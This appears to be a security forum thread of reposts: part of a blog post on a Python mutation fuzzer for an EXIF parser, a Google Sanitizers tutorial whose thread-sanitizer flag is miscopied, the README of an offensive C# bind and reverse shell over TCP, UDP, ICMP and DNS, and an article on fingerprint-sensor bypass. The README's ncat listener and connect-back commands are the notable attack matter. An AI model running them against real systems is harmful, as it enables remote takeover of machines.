onto implementing our second mutation method Gynvael’s Magic Numbers During the aformentioned GynvaelColdwind ‘Basics of fuzzing’ stream, he enumerates several ‘magic numbers’ which can have devestating effects on programs. Typically, these numbers relate to data type sizes and arithmetic-induced errors. The numbers discussed were: 0xFF 0x7F 0x00 0xFFFF 0x0000 0xFFFFFFFF 0x00000000 0x80000000 <—- minimum 32-bit int 0x40000000 <—- just half of that amount 0x7FFFFFFF <—- max 32-bit int If there is any kind of arithmetic performed on these types of values in the course of malloc() or other types of operations, overflows can be common. For instance if you add 0x1 to 0xFF on a one-byte register, it would roll over to 0x00 this can be unintended behavior. HEVD actually has an integer overflow bug similar to this concept. Let’s say our fuzzer chooses 0x7FFFFFFF as the magic number it wants to use, that value is 4 bytes long so we would have to find a byte index in our array, and overwrite that byte plus the next three. Let’s go ahead and start implementing this in our fuzzer. Implementing Mutation Method #2 First we’ll want to create a list of tuples like Gynvael did where the first number in the tuple is the byte-size of the magic number and the second number is the byte value in decimal of the first byte. def magic(data): magic_vals = [ (1, 255), (1, 255), (1, 127), (1, 0), (2, 255), (2, 0), (4, 255), (4, 0), (4, 128), (4, 64), (4, 127) ] picked_magic = random.choice(magic_vals) print(picked_magic) If we run this we can see that it’s randomly selecting a magic value tuple. root@kali:~# python3 fuzzer.py Canon_40D.jpg (4, 64) root@kali:~# python3 fuzzer.py Canon_40D.jpg (4, 128) root@kali:~# python3 fuzzer.py Canon_40D.jpg (4, 0) root@kali:~# python3 fuzzer.py Canon_40D.jpg (2, 255) root@kali:~# python3 fuzzer.py Canon_40D.jpg (4, 0) We now need to overwrite a random 1 to 4 byte value in the JPEG with this new magic 1 to 4 byte value. We will set up our possible indexes the same as the previous method, select an index, and then overwrite the bytes at that index with our picked_magic number. So if we get (4, 128) for instance, we know its 4 bytes, and the magic number is 0x80000000. So we’ll do something like: byte[x] = 128 byte[x+1] = 0 byte[x+2] = 0 byte[x+3] = 0 All in all, our function will look like this: def magic(data): magic_vals = [ (1, 255), (1, 255), (1, 127), (1, 0), (2, 255), (2, 0), (4, 255), (4, 0), (4, 128), (4, 64), (4, 127) ] picked_magic = random.choice(magic_vals) length = len(data) - 8 index = range(0, length) picked_index = random.choice(index) # here we are hardcoding all the byte overwrites for all of the tuples that begin (1, ) if picked_magic[0] == 1: if picked_magic[1] == 255: # 0xFF data[picked_index] = 255 elif picked_magic[1] == 127: # 0x7F data[picked_index] = 127 elif picked_magic[1] == 0: # 0x00 data[picked_index] = 0 # here we are hardcoding all the byte overwrites for all of the tuples that begin (2, ) elif picked_magic[0] == 2: if picked_magic[1] == 255: # 0xFFFF data[picked_index] = 255 data[picked_index + 1] = 255 elif picked_magic[1] == 0: # 0x0000 data[picked_index] = 0 data[picked_index + 1] = 0 # here we are hardcoding all of the byte overwrites for all of the tuples that being (4, ) elif picked_magic[0] == 4: if picked_magic[1] == 255: # 0xFFFFFFFF data[picked_index] = 255 data[picked_index + 1] = 255 data[picked_index + 2] = 255 data[picked_index + 3] = 255 elif picked_magic[1] == 0: # 0x00000000 data[picked_index] = 0 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 3] = 0 elif picked_magic[1] == 128: # 0x80000000 data[picked_index] = 128 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 3] = 0 elif picked_magic[1] == 64: # 0x40000000 data[picked_index] = 64 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 3] = 0 elif picked_magic[1] == 127: # 0x7FFFFFFF data[picked_index] = 127 data[picked_index + 1] = 255 data[picked_index + 2] = 255 data[picked_index + 3] = 255 return data Analyzing Mutation #2 Running our script now and analyzing the results in Beyond Compare, we can see that a two byte value of 0xA6 0x76 was overwritten with 0xFF 0xFF. This is exactly what we wanted to accomplish. Starting to Fuzz Now that we have two reliable ways of mutating the data, we need to: mutate the data with one of our functions, create new picture with mutated data, feed mutated picture to our binary for parsing, catch any Segmentation faults and log the picture that caused it Victim? For our victim program, we will search Google with site:github.com "exif" language:c to find Github projects written in C that have a reference to ‘exif’. A quick looksie brings us to https://github.com/mkttanabe/exif. We can install by git cloning the repo, and using the building with gcc instructions included in the README. (I’ve placed the compiled binary in /usr/bin just for ease.) Let’s first see how the program handles our valid JPEG. root@kali:~# exif Canon_40D.jpg -verbose system: little-endian data: little-endian [Canon_40D.jpg] createIfdTableArray: result=5 {0TH IFD} tags=11 tag[00] 0x010F Make type=2 count=6 val=[Canon] tag[01] 0x0110 Model type=2 count=14 val=[Canon EOS 40D] tag[02] 0x0112 Orientation type=3 count=1 val=1 tag[03] 0x011A XResolution type=5 count=1 val=72/1 tag[04] 0x011B YResolution type=5 count=1 val=72/1 tag[05] 0x0128 ResolutionUnit type=3 count=1 val=2 tag[06] 0x0131 Software type=2 count=11 val=[GIMP 2.4.5] tag[07] 0x0132 DateTime type=2 count=20 val=[2008:07:31 10:38:11] tag[08] 0x0213 YCbCrPositioning type=3 count=1 val=2 tag[09] 0x8769 ExifIFDPointer type=4 count=1 val=214 tag[10] 0x8825 GPSInfoIFDPointer type=4 count=1 val=978 {EXIF IFD} tags=30 tag[00] 0x829A ExposureTime type=5 count=1 val=1/160 tag[01] 0x829D FNumber type=5 count=1 val=71/10 tag[02] 0x8822 ExposureProgram type=3 count=1 val=1 tag[03] 0x8827 PhotographicSensitivity type=3 count=1 val=100 tag[04] 0x9000 ExifVersion type=7 count=4 val=0 2 2 1 tag[05] 0x9003 DateTimeOriginal type=2 count=20 val=[2008:05:30 15:56:01] tag[06] 0x9004 DateTimeDigitized type=2 count=20 val=[2008:05:30 15:56:01] tag[07] 0x9101 ComponentsConfiguration type=7 count=4 val=0x01 0x02 0x03 0x00 tag[08] 0x9201 ShutterSpeedValue type=10 count=1 val=483328/65536 tag[09] 0x9202 ApertureValue type=5 count=1 val=368640/65536 tag[10] 0x9204 ExposureBiasValue type=10 count=1 val=0/1 tag[11] 0x9207 MeteringMode type=3 count=1 val=5 tag[12] 0x9209 Flash type=3 count=1 val=9 tag[13] 0x920A FocalLength type=5 count=1 val=135/1 tag[14] 0x9286 UserComment type=7 count=264 val=0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 (omitted) tag[15] 0x9290 SubSecTime type=2 count=3 val=[00] tag[16] 0x9291 SubSecTimeOriginal type=2 count=3 val=[00] tag[17] 0x9292 SubSecTimeDigitized type=2 count=3 val=[00] tag[18] 0xA000 FlashPixVersion type=7 count=4 val=0 1 0 0 tag[19] 0xA001 ColorSpace type=3 count=1 val=1 tag[20] 0xA002 PixelXDimension type=4 count=1 val=100 tag[21] 0xA003 PixelYDimension type=4 count=1 val=68 tag[22] 0xA005 InteroperabilityIFDPointer type=4 count=1 val=948 tag[23] 0xA20E FocalPlaneXResolution type=5 count=1 val=3888000/876 tag[24] 0xA20F FocalPlaneYResolution type=5 count=1 val=2592000/583 tag[25] 0xA210 FocalPlaneResolutionUnit type=3 count=1 val=2 tag[26] 0xA401 CustomRendered type=3 count=1 val=0 tag[27] 0xA402 ExposureMode type=3 count=1 val=1 tag[28] 0xA403 WhiteBalance type=3 count=1 val=0 tag[29] 0xA406 SceneCaptureType type=3 count=1 val=0 {Interoperability IFD} tags=2 tag[00] 0x0001 InteroperabilityIndex type=2 count=4 val=[R98] tag[01] 0x0002 InteroperabilityVersion type=7 count=4 val=0 1 0 0 {GPS IFD} tags=1 tag[00] 0x0000 GPSVersionID type=1 count=4 val=2 2 0 0 {1ST IFD} tags=6 tag[00] 0x0103 Compression type=3 count=1 val=6 tag[01] 0x011A XResolution type=5 count=1 val=72/1 tag[02] 0x011B YResolution type=5 count=1 val=72/1 tag[03] 0x0128 ResolutionUnit type=3 count=1 val=2 tag[04] 0x0201 JPEGInterchangeFormat type=4 count=1 val=1090 tag[05] 0x0202 JPEGInterchangeFormatLength type=4 count=1 val=1378 0th IFD : Model = [Canon EOS 40D] Exif IFD : DateTimeOriginal = [2008:05:30 15:56:01] We see that the program is parsing out the tags and stating the byte values associated with them. This is pretty much exactly what we set out to find. Chasing Segfaults Ideally we’d like to feed this binary some mutated data and have it segfault meaning we have found a bug. The problem I ran into was that when I monitored stdout and stderr for the Segmentation fault message, it never appeared. That’s because the Segmentation fault message comes from our command shell instead of the binary. It means the shell received a SIGSEGV signal and in response prints the message. One way I found to monitor this was to use the run() method from the pexpect Python module and the quote() method from the pipes Python module. We’ll add a new function, that will take in a counter parameter which will be what fuzzing iteration we’re on and also the mutated data in another parameter. If we see Segmentation in the output of our run() command, we’ll write the mutated data to a file and save it so that we have the JPEG image that crashed the binary. Let’s create a new folder called crashes and we’ll save JPEGs in there that cause crashes in the format crash.<fuzzing iteration (counter)>.jpg. So if fuzzing iteration 100 caused a crash, we should get a file like: /crashes/crash.100.jpg. We’ll keep printing to the same line in the terminal to keep a count of every 100 fuzzing iterations. Our function looks like this: def exif(counter,data): command = "exif mutated.jpg -verbose" out, returncode = run("sh -c " + quote(command), withexitstatus=1) if b"Segmentation" in out: f = open("crashes/crash.{}.jpg".format(str(counter)), "ab+") f.write(data) if counter % 100 == 0: print(counter, end="\r") Next, we’ll alter our execution stub at the bottom of our script to run on a counter. Once we hit 1000 iterations, we’ll stop fuzzing. We’ll also have our fuzzer randomly select one of our mutation methods. So it might bit-flip or it might use a magic number. Let’s run it and then check our crashes folder when it completes. Once the fuzzer completes, you can see we got ~30 crashes! root@kali:~/crashes# ls crash.102.jpg crash.317.jpg crash.52.jpg crash.620.jpg crash.856.jpg crash.129.jpg crash.324.jpg crash.551.jpg crash.694.jpg crash.861.jpg crash.152.jpg crash.327.jpg crash.559.jpg crash.718.jpg crash.86.jpg crash.196.jpg crash.362.jpg crash.581.jpg crash.775.jpg crash.984.jpg crash.252.jpg crash.395.jpg crash.590.jpg crash.785.jpg crash.985.jpg crash.285.jpg crash.44.jpg crash.610.jpg crash.84.jpg crash.987.jpg We can test this now with a quick one-liner to confirm the results: root@kali:~/crashes# for i in *.jpg; do exif "$i" -verbose > /dev/null 2>&1; done. Remember, we can route both STDOUT and STDERR to /dev/null because “Segmentation fault” comes from the shell, not from the binary. We run this and this is the output: root@kali:~/crashes# for i in *.jpg; do exif "$i" -verbose > /dev/null 2>&1; done Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault Segmentation fault -----SNIP----- You can’t see all of them, but that’s 30 segfaults, so everything appears to be working as planned! Triaging Crashes Now that we have ~30 crashes and the JPEGs that caused them, the next step would be to analyze these crashes and figure out how many of them are unique. This is where we’ll leverage some of the things I’ve learned watching Brandon Faulk’s streams. A quick look at the crash samples in Beyond Compare tells me that most were caused by our bit_flip() mutation and not the magic() mutation method. Interesting. As a test, while we progress, we can turn off the randomness of the function selection and run let’s say 100,000 iterations with just the magic() mutator and see if we get any crashes. Using ASan to Analyze Crashes ASan is the “Address Sanitizer” and it’s a utility that comes with newer versions of gcc that allows users to compile a binary with the -fsanitize=address switch and get access to a very detailed information in the event that a memory access bug occurs, even those that cause a crash. Obviously we’ve pre-selected for crashing inputs here so we will miss out on that utility but perhaps we’ll save it for another time. To use ASan, I follwed along with the Fuzzing Project and recompiled exif with the flags: cc -fsanitize=address -ggdb -o exifsan sample_main.c exif.c. I then moved exifsan to /usr/bin for ease of use. If we run this newly compiled binary on a crash sample, let’s see the output. root@kali:~/crashes# exifsan crash.252.jpg -verbose system: little-endian data: little-endian ================================================================= ==18831==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb4d00758 at pc 0x00415b9e bp 0xbf8c91f8 sp 0xbf8c91ec READ of size 4 at 0xb4d00758 thread T0 #0 0x415b9d in parseIFD /root/exif/exif.c:2356 #1 0x408f10 in createIfdTableArray /root/exif/exif.c:271 #2 0x4076ba in main /root/exif/sample_main.c:63 #3 0xb77d0ef0 in __libc_start_main ../csu/libc-start.c:308 #4 0x407310 in _start (/usr/bin/exifsan+0x2310) 0xb4d00758 is located 0 bytes to the right of 8-byte region [0xb4d00750,0xb4d00758) allocated by thread T0 here: #0 0xb7aa2097 in __interceptor_malloc (/lib/i386-linux-gnu/libasan.so.5+0x10c097) #1 0x415a9f in parseIFD /root/exif/exif.c:2348 #2 0x408f10 in createIfdTableArray /root/exif/exif.c:271 #3 0x4076ba in main /root/exif/sample_main.c:63 #4 0xb77d0ef0 in __libc_start_main ../csu/libc-start.c:308 SUMMARY: AddressSanitizer: heap-buffer-overflow /root/exif/exif.c:2356 in parseIFD Shadow bytes around the buggy address: 0x369a0090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a00a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a00b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a00c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a00d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x369a00e0: fa fa fa fa fa fa fa fa fa fa 00[fa]fa fa 04 fa 0x369a00f0: fa fa 00 06 fa fa 06 fa fa fa fa fa fa fa fa fa 0x369a0100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a0110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a0120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x369a0130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==18831==ABORTING This is wonderful. Not only do we get detailed information but ASan also classifies the bug class for us, tells us the crash address and provides a nice stack trace. As you can see, we were performing a 4-byte read operation in the parseIFD function inside of exif.c. READ of size 4 at 0xb4d00758 thread T0 #0 0x415b9d in parseIFD /root/exif/exif.c:2356 #1 0x408f10 in createIfdTableArray /root/exif/exif.c:271 #2 0x4076ba in main /root/exif/sample_main.c:63 #3 0xb77d0ef0 in __libc_start_main ../csu/libc-start.c:308 #4 0x407310 in _start (/usr/bin/exifsan+0x2310) Since this is all standard binary output now, we can actually triage these crashes and try to make sense of them. Let’s first try to deduplicate the crashes. It’s possible here that all 30 of our crashes are the same bug. It’s also possible that we have 30 unique crashes (not likely lol). So we need to sort that out. Let’s again appeal to a Python script, we’ll iterate through this folder, run the ASan enabled binary against each crash and log where the crashing address is for each. We’ll also try to capture if it’s a 'READ' or 'WRITE' operation as well. So for example, for crash.252.jpg, we’ll format the log file as: crash.252.HBO.b4f00758.READ and we’ll write the ASan output to the log. This way we know the crash image that caused it, the bug class, the address, and the operation before we even open the log. (I’ll post the triage script at the end, it’s so gross ugh, I hate it.) After running the triage script on our crashes folder, we can now see we have triaged our crashes and there is something very interesting. crash.102.HBO.b4f006d4.READ crash.102.jpg crash.129.HBO.b4f005dc.READ crash.129.jpg crash.152.HBO.b4f005dc.READ crash.152.jpg crash.317.HBO.b4f005b4.WRITE crash.317.jpg crash.285.SEGV.00000000.READ crash.285.jpg ------SNIP----- After a big SNIP there, out of my 30 crashes, I only had one WRITE operation. You can’t tell from the snipped output but I also had a lot of SEGV bugs where a NULL address was referenced (0x00000000). Let’s also check in on our modified fuzzer that was running only the magic() mutator for 100,000 iterations and see if it turned up any bugs. root@kali:~/crashes2# ls crash.10354.jpg crash.2104.jpg crash.3368.jpg crash.45581.jpg crash.64750.jpg crash.77850.jpg crash.86367.jpg crash.94036.jpg crash.12771.jpg crash.21126.jpg crash.35852.jpg crash.46757.jpg crash.64987.jpg crash.78452.jpg crash.86560.jpg crash.9435.jpg crash.13341.jpg crash.23547.jpg crash.39494.jpg crash.46809.jpg crash.66340.jpg crash.78860.jpg crash.88799.jpg crash.94770.jpg crash.14060.jpg crash.24492.jpg crash.40953.jpg crash.49520.jpg crash.6637.jpg crash.79019.jpg crash.89072.jpg crash.95438.jpg crash.14905.jpg crash.25070.jpg crash.41505.jpg crash.50723.jpg crash.66389.jpg crash.79824.jpg crash.89738.jpg crash.95525.jpg crash.18188.jpg crash.27783.jpg crash.41700.jpg crash.52051.jpg crash.6718.jpg crash.81206.jpg crash.90506.jpg crash.96746.jpg crash.18350.jpg crash.2990.jpg crash.43509.jpg crash.54074.jpg crash.68527.jpg crash.8126.jpg crash.90648.jpg crash.98727.jpg crash.19441.jpg crash.30599.jpg crash.43765.jpg crash.55183.jpg crash.6987.jpg crash.82472.jpg crash.90745.jpg crash.9969.jpg crash.19581.jpg crash.31243.jpg crash.43813.jpg crash.5857.jpg crash.70713.jpg crash.83282.jpg crash.92426.jpg crash.19907.jpg crash.31563.jpg crash.44974.jpg crash.59625.jpg crash.77590.jpg crash.83284.jpg crash.92775.jpg crash.2010.jpg crash.32642.jpg crash.4554.jpg crash.64255.jpg crash.77787.jpg crash.84766.jpg crash.92906.jpg That’s a lot of crashes! Getting Serious, Conclusion The fuzzer could be optimized a ton, it’s really crude at the moment and only meant to demonstrate very basic mutation fuzzing. The bug triaging process is also a mess and felt really hacky the whole way, I guess I need to watch some more @gamozolabs streams. Maybe next time we do fuzzing we’ll try a harder target, write the fuzzer in a cool language like Rust or Go, and we’ll try to really refine the triaging process/exploit one of the bugs! Thanks to everyone referenced in the blogpost, huge thanks. Until next time! Code JPEGfuzz.py #!/usr/bin/env python3 import sys import random from pexpect import run from pipes import quote # read bytes from our valid JPEG and return them in a mutable bytearray def get_bytes(filename): f = open(filename, "rb").read() return bytearray(f) def bit_flip(data): num_of_flips = int((len(data) - 4) * .01) indexes = range(4, (len(data) - 4)) chosen_indexes = [] # iterate selecting indexes until we've hit our num_of_flips number counter = 0 while counter < num_of_flips: chosen_indexes.append(random.choice(indexes)) counter += 1 for x in chosen_indexes: current = data[x] current = (bin(current).replace("0b","")) current = "0" * (8 - len(current)) + current indexes = range(0,8) picked_index = random.choice(indexes) new_number = [] # our new_number list now has all the digits, example: ['1', '0', '1', '0', '1', '0', '1', '0'] for i in current: new_number.append(i) # if the number at our randomly selected index is a 1, make it a 0, and vice versa if new_number[picked_index] == "1": new_number[picked_index] = "0" else: new_number[picked_index] = "1" # create our new binary string of our bit-flipped number current = '' for i in new_number: current += i # convert that string to an integer current = int(current,2) # change the number in our byte array to our new number we just constructed data[x] = current return data def magic(data): magic_vals = [ (1, 255), (1, 255), (1, 127), (1, 0), (2, 255), (2, 0), (4, 255), (4, 0), (4, 128), (4, 64), (4, 127) ] picked_magic = random.choice(magic_vals) length = len(data) - 8 index = range(0, length) picked_index = random.choice(index) # here we are hardcoding all the byte overwrites for all of the tuples that begin (1, ) if picked_magic[0] == 1: if picked_magic[1] == 255: # 0xFF data[picked_index] = 255 elif picked_magic[1] == 127: # 0x7F data[picked_index] = 127 elif picked_magic[1] == 0: # 0x00 data[picked_index] = 0 # here we are hardcoding all the byte overwrites for all of the tuples that begin (2, ) elif picked_magic[0] == 2: if picked_magic[1] == 255: # 0xFFFF data[picked_index] = 255 data[picked_index + 1] = 255 elif picked_magic[1] == 0: # 0x0000 data[picked_index] = 0 data[picked_index + 1] = 0 # here we are hardcoding all of the byte overwrites for all of the tuples that being (4, ) elif picked_magic[0] == 4: if picked_magic[1] == 255: # 0xFFFFFFFF data[picked_index] = 255 data[picked_index + 1] = 255 data[picked_index + 2] = 255 data[picked_index + 3] = 255 elif picked_magic[1] == 0: # 0x00000000 data[picked_index] = 0 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 3] = 0 elif picked_magic[1] == 128: # 0x80000000 data[picked_index] = 128 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 3] = 0 elif picked_magic[1] == 64: # 0x40000000 data[picked_index] = 64 data[picked_index + 1] = 0 data[picked_index + 2] = 0 data[picked_index + 3] = 0 elif picked_magic[1] == 127: # 0x7FFFFFFF data[picked_index] = 127 data[picked_index + 1] = 255 data[picked_index + 2] = 255 data[picked_index + 3] = 255 return data # create new jpg with mutated data def create_new(data): f = open("mutated.jpg", "wb+") f.write(data) f.close() def exif(counter,data): command = "exif mutated.jpg -verbose" out, returncode = run("sh -c " + quote(command), withexitstatus=1) if b"Segmentation" in out: f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+") f.write(data) if counter % 100 == 0: print(counter, end="\r") if len(sys.argv) < 2: print("Usage: JPEGfuzz.py <valid_jpg>") else: filename = sys.argv[1] counter = 0 while counter < 100000: data = get_bytes(filename) functions = [0, 1] picked_function = random.choice(functions) if picked_function == 0: mutated = magic(data) create_new(mutated) exif(counter,mutated) else: mutated = bit_flip(data) create_new(mutated) exif(counter,mutated) counter += 1 triage.py #!/usr/bin/env python3 import os from os import listdir def get_files(): files = os.listdir("/root/crashes/") return files def triage_files(files): for x in files: original_output = os.popen("exifsan " + x + " -verbose 2>&1").read() output = original_output # Getting crash reason crash = '' if "SEGV" in output: crash = "SEGV" elif "heap-buffer-overflow" in output: crash = "HBO" else: crash = "UNKNOWN" if crash == "HBO": output = output.split("\n") counter = 0 while counter < len(output): if output[counter] == "=================================================================": target_line = output[counter + 1] target_line2 = output[counter + 2] counter += 1 else: counter += 1 target_line = target_line.split(" ") address = target_line[5].replace("0x","") target_line2 = target_line2.split(" ") operation = target_line2[0] elif crash == "SEGV": output = output.split("\n") counter = 0 while counter < len(output): if output[counter] == "=================================================================": target_line = output[counter + 1] target_line2 = output[counter + 2] counter += 1 else: counter += 1 if "unknown address" in target_line: address = "00000000" else: address = None if "READ" in target_line2: operation = "READ" elif "WRITE" in target_line2: operation = "WRITE" else: operation = None log_name = (x.replace(".jpg","") + "." + crash + "." + address + "." + operation) f = open(log_name,"w+") f.write(original_output) f.close() files = get_files() triage_files(files) Tags: exif fuzzing jpeg mutation parsing Python Updated: April 04, 2020 Sursa: https://h0mbre.github.io/Fuzzing-Like-A-Caveman/#
  22. Detect Bugs using Google Sanitizers Apr 03, 2019 Shawn Tutorials No comments yet Google Sanitizers are a set of dynamic code analysis tools to detect common bugs in your code, including Thread Sanitizer: detect data race, thread leak, deadlock Address Sanitizer: detect buffer overflow, dangling pointer dereference Leak Sanitizer: part of Address Sanitizer, detect memory leak Undefined Behavior Sanitizer: detect integer overflow, float-number overflow Memory Sanitizer: detect of uninitialized memory reads Preparation For Windows users, install gcc with MinGW, or install Clang For Mac users, install Clang using `xcode-select --install` For Linux users, make sure you have gcc installed. Open CLion and make sure that the run button is clickable with toolchains configured correctly. Run Program with Sanitizer To run a program with sanitizer, we need a special flag -fsanitize to the compiler. Common options include: -fsanitize=address, -fsanitize=thread, -fsanitize=memory, -fsanitize=undefined, -fsanitize=leak. A full list of options can be found here. Note that it is not possible to combine more than one of the -fsanitize=address, -fsanitize=thread, and -fsanitize=memory checkers in the same program, so you may need to toggle the options multiple times for a comprehensive checking. For testing, let's add the following line to the CMakeLists.txt file: set(CMAKE_C_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=address -g") When you run the code, you should be able to see a sanitizer tab next to the console. Thread Sanitizer Example Here is a poorly-written multithreading program: int counter = 0; pthread_mutex_t lock; void *inc() { pthread_mutex_lock(&lock); // lock not initiazlied counter++; // thread contention pthread_mutex_unlock(&lock); return NULL; } void thread_bugs() { pthread_t tid; for (int i = 0; i < 2; ++i) pthread_create(&tid, NULL, inc, NULL); printf("%d", counter); // print the result before join pthread_join(tid, NULL); // the first thread is not joined } Add the following line to the CMakeLists.txt to enable the Thread Sanitizer set(CMAKE_C_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=address -g") When the program is executing, the sanitizer will generate a report for thread-related bugs. Be aware that your program might run significantly slower with sanitizers enabled. The sanitizer noticed that two threads are reading/writing to the same memory location at the line counter++;, since we the locked is used before initialized. There is also a data race between counter++ and the print statement since the main thread did not wait for one of the child threads. Finally, there is a thread leak by the same reason above. Address Sanitizer Example To enable the Address Sanitizer, you need to add the following line to the CMakeLists.txt set(CMAKE_C_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=address -g") It helps you detect heap overflow, which may happen when you incorrectly calculated the size. Here is an example of overflowing a stack-allocated array The Address Sanitizer also checks for using freed pointers. Note that it shows you where is memory is allocated and freed. Here is a silly example of freeing the same memory twice, but it will be less noticeable when different pointers are pointing to the same heap location. References https://clang.llvm.org/docs/UsersManual.html https://www.jetbrains.com/help/clion/google-sanitizers.html Sursa: https://shawnzhong.com/2019/04/03/detect-bugs-using-google-sanitizers/
  23. SharpOffensiveShell A sort of simple shell which support multiple protocols. This project is just for improving my C# coding ability. The SharpOffsensiveShell DNS mode use the Native Windows API instead of the Nslookup command to perform DNS requests. QuickStart SharpOffsensiveShell support .NET Framework 2.0 csc SharpOffensiveShell.cs TCP For bind shell sharpoffensiveshell.exe tcp listen 0.0.0.0 8080 ncat -v 1.1.1.1 8080 For reverse shell ncat -lvp 8080 sharpoffensiveshell.exe tcp connect 1.1.1.1 8080 UDP For bind shell sharpoffensiveshell.exe tcp listen 0.0.0.0 8080 ncat -u -v 1.1.1.1 8080 For reverse shell ncat -u -lvp 8080 When reverse connection accepted, type enter to make prompt display. sharpoffensiveshell.exe tcp connect 1.1.1.1 8080 ICMP git clone https://github.com/inquisb/icmpsh sysctl -w net.ipv4.icmp_echo_ignore_all=1 cd icmpsh && python icmpsh-m.py listenIP reverseConnectIP sharpoffensiveshell.exe icmp connect listenIP DNS pip install dnslib git clone https://github.com/sensepost/DNS-Shell For direct mode python DNS-Shell.py -l -d [Server IP] sharpoffensiveshell.exe dns direct ServerIP Domain For recursive mode DNS-Shell.py -l -r [Domain] sharpoffensiveshell.exe dns recurse Domain Sursa: https://github.com/darkr4y/SharpOffensiveShell
  24. Attackers can bypass fingerprint authentication with an ~80% success rate Fingerprint-based authentication is fine for most people, but it's hardly foolproof. Dan Goodin - 4/8/2020, 4:00 PM Enlarge Andri Koolme 117 with 76 posters participating, including story author Share on Facebook Share on Twitter For decades, the use of fingerprints to authenticate users to computers, networks, and restricted areas was (with a few notable exceptions) mostly limited to large and well-resourced organizations that used specialized and expensive equipment. That all changed in 2013 when Apple introduced TouchID. Within a few years, fingerprint-based validation became available to the masses as computer, phone, and lock manufacturers added sensors that gave users an alternative to passwords when unlocking the devices. Further Reading Bypassing TouchID was “no challenge at all,” hacker tells Ars Although hackers managed to defeat TouchID with a fake fingerprint less than 48 hours after the technology was rolled out in the iPhone 5S, fingerprint-based authentication over the past few years has become much harder to defeat. Today, fingerprints are widely accepted as a safe alternative over passwords when unlocking devices in many, but not all, contexts. A very high probability A study published on Wednesday by Cisco’s Talos security group makes clear that the alternative isn’t suitable for everyone—namely those who may be targeted by nation-sponsored hackers or other skilled, well-financed, and determined attack groups. The researchers spent about $2,000 over several months testing fingerprint authentication offered by Apple, Microsoft, Samsung, Huawei, and three lock makers. The result: on average, fake fingerprints were able to bypass sensors at least once roughly 80 percent of the time. The percentages are based on 20 attempts for each device with the best fake fingerprint the researchers were able to create. While Apple Apple products limit users to five attempts before asking for the PIN or password, the researchers subjected the devices to 20 attempts (that is, multiple groups of from one or more attempts). Of the 20 attempts, 17 were successful. Other products tested permitted significantly more or even an unlimited number of unsuccessful tries. Tuesday’s report was quick to point out that the results required several months of painstaking work, with more than 50 fingerprint molds created before getting one to work. The study also noted that the demands of the attack—which involved obtaining a clean image of a target’s fingerprint and then getting physical access to the target’s device—meant that only the most determined and capable adversaries would succeed. “Even so, this level of success rate means that we have a very high probability of unlocking any of the tested devices before it falls back into the PIN unlocking," Talos researchers Paul Rascagneres and Vitor Ventura wrote. “The results show fingerprints are good enough to protect the average person's privacy if they lose their phone. However, a person that is likely to be targeted by a well-funded and motivated actor should not use fingerprint authentication.” The devices that were the most susceptible to fake fingerprints were the AICase padlock and Huawei’s Honor 7x and Samsung’s Note 9 Android phones, all of which were bypassed 100 percent of the time. Fingerprint authentication in the iPhone 8, MacBook Pro 2018, and the Samsung S10 came next, where the success rate was more than 90 percent. Five laptop models running Windows 10 and two USB drives—the Verbatim Fingerprint Secure and the Lexar Jumpdrive F35—performed the best, with researchers achieving a 0-percent success rate. The chart below summarizes the results: Enlarge / The orange lines are the percent of success with the direct collection method, the blue lines with the image sensor method and the yellow line with the picture method. Cisco Talos The reason for the better results from the Windows 10 machines, the researchers said, is that the comparison algorithm for all of them resided in the OS, and therefore the result was shared among all platforms. The researchers cautioned against concluding that the zero success-rate for Windows 10 devices and the USB drives meant they were safer. “We estimate that with a larger budget, more resources and a team dedicated to this task, it is possible to bypass these systems, too,” they wrote. One other product tested—a Samsung A70—also attained a 0-percent failure rate, but researchers attributed this to the difficulty getting authentication to work even when it received input from real fingerprints that had been enrolled. Defeating fingerprint authentication: A how-to There are two steps to fingerprint authentication: capturing, in which a sensor generates an image of the fingerprint, and analysis that compares the inputted fingerprint to the fingerprint that’s enrolled. Some devices use firmware that runs on the sensor to perform the comparison while others rely on the operating system. Windows Hello included in Windows 10, for example, performs the comparison from the OS using Microsoft’s Biometric Devices Design Guide. There are three types of sensors. Capacitive sensors use a finger’s natural electrical conductivity to read prints, as ridges touch the reader while valleys do not. Optical sensors read the image of a fingerprint by using a light source that illuminates ridges in contact with the reader and reads them through a prism. Ultrasonic sensors emit an ultrasonic pulse that generates an echo that’s read by the sensor, with ridges and valleys registering different signatures. The researchers devised three techniques for collecting the fingerprint of a target. The first is direct collection, which involves a target pressing a finger on a brand of clay known as Plastiline. With that, the attacker obtains a negative of the fingerprint. The second technique is to have the target press a finger onto a fingerprint reader, such as the kind that’s used at airports, banks, and border crossings. The reader would then capture a bitmap image of the print. The third is to capture a print on a drinking glass or other transparent surface 